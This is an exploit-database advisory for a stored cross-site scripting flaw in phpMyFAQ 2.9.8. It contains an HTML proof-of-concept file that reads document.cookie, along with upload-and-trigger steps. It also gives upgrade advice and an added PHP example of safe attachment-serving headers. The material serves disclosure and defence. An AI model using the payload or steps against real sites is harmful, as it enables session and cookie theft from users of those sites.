PHPMyFAQ 2.9.8 – Cross-Site Scripting (3)

  • Author: Nikhil Mittal
    Date: 2017-10-28
  • Source: https://www.exploit-db.com/exploits/43063/
# Exploit Title: phpMyFAQ 2.9.8 Stored XSS Vulnerability
# Date: 28-9-2017
# Exploit Author: Nikhil Mittal (Payatu Labs)
# Vendor Homepage: http://www.phpmyfaq.de/
# Software Link: http://download.phpmyfaq.de/phpMyFAQ-2.9.8.zip
# Version: 2.9.8
# Tested on: MAC OS
# CVE : 2017-15727

1. Description

In phpMyFAQ before 2.9.9, there is Stored Cross-site Scripting (XSS) via an HTML attachment.

2. Proof of concept

Exploit code

<!DOCTYPE html>
<html>
<head>
<title>XSS EXPLOIT</title>
</head>
<body>
<script>confirm(document.cookie)</script>
</body>
</html>

Steps to reproduce:

1. Create a user with limited access rights to the attachment section.
2. Go to http://localhost/phpmyfaq/admin/?action=editentry
3. Upload the exploit code with an .html extension in the attachments area.
4. Access the file URL generated under /phpmyfaq/attachments/<random_path>
5. Reach the last file by directory traversal and the XSS will trigger.

3. Solution

Update to phpMyFAQ version 2.9.9
http://download.phpmyfaq.de/phpMyFAQ-2.9.9.zip
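Beyond upgrading, the root cause here is an uploaded HTML file being served inline from the application's origin. The following is an added PHP example (not phpMyFAQ's code and not a description of the 2.9.9 fix; the function names and the type list are assumptions) showing a header policy that hands uploaded attachments out as opaque downloads so a browser never renders them as a document:

```php
<?php
// Added example: header policy for serving user-uploaded attachments.
// Not phpMyFAQ code; function names and the type list are assumptions.

// MIME types a browser would execute or render actively if served inline.
const ACTIVE_CONTENT_TYPES = [
    'text/html', 'application/xhtml+xml', 'image/svg+xml',
    'text/xml', 'application/xml', 'application/javascript', 'text/javascript',
];

/**
 * Build response headers for an uploaded attachment so that the browser
 * never renders it as a document in the application's origin.
 * $detectedMime must come from server-side sniffing of the stored bytes
 * (e.g. finfo), never from the upload's declared type or its extension.
 */
function attachmentHeaders(string $storedName, string $detectedMime): array
{
    // Drop anything a client could use to break the Content-Disposition value.
    $safeName = preg_replace('/[^A-Za-z0-9._-]/', '_', basename($storedName));
    if ($safeName === '' || $safeName[0] === '.') {
        $safeName = 'attachment_' . $safeName;
    }

    $mime = strtolower(trim(explode(';', $detectedMime)[0]));
    // Active content is handed out as an opaque download, not as its real type.
    if ($mime === '' || in_array($mime, ACTIVE_CONTENT_TYPES, true)) {
        $mime = 'application/octet-stream';
    }

    return [
        'Content-Type'            => $mime,
        // Force download: the file is never displayed inline.
        'Content-Disposition'     => 'attachment; filename="' . $safeName . '"',
        // Stop MIME sniffing from promoting octet-stream back to HTML.
        'X-Content-Type-Options'  => 'nosniff',
        // Defence in depth if some client still renders the response.
        'Content-Security-Policy' => "default-src 'none'; sandbox",
    ];
}

// Emitter kept separate from the policy so the policy stays unit-testable.
function sendAttachment(string $path, string $storedName): void
{
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($path) ?: '';
    foreach (attachmentHeaders($storedName, $mime) as $name => $value) {
        header($name . ': ' . $value);
    }
    readfile($path);
}
```

With this policy the uploaded exploit.html from the proof of concept is returned as application/octet-stream with a forced download, so the embedded script never runs in the phpMyFAQ origin.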